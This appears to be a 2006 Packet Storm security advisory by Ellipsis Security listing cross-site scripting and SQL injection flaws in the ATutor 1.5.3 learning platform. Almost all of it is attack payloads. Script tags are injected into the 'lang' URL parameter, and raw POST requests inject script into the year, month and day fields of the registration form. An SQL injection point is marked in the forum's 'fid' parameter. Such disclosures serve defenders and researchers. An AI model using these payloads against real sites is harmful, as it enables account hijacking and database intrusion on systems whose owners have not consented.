atutor153-xss-sql.txt

2006-07-09T00:00:00
ID PACKETSTORM:48107
Type packetstorm
Reporter ellsec.org
Modified 2006-07-09T00:00:00

Description

```
ATutor 1.5.3
http://www.atutor.ca
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/documentation/index_list.php?lang="><script>alert(/EllipsisSecurityTest/)</script>
---
POST http://target.xx:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
ml=1&year="><script>alert(/EllipsisSecurityTest/)</script>
---
POST http://target.xx:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
ml=1&month="><script>alert(/EllipsisSecurityTest/)</script>
---
POST http://target.xx:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
ml=1&day="><script>alert(/EllipsisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/forum/index.php?fid=-1[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
```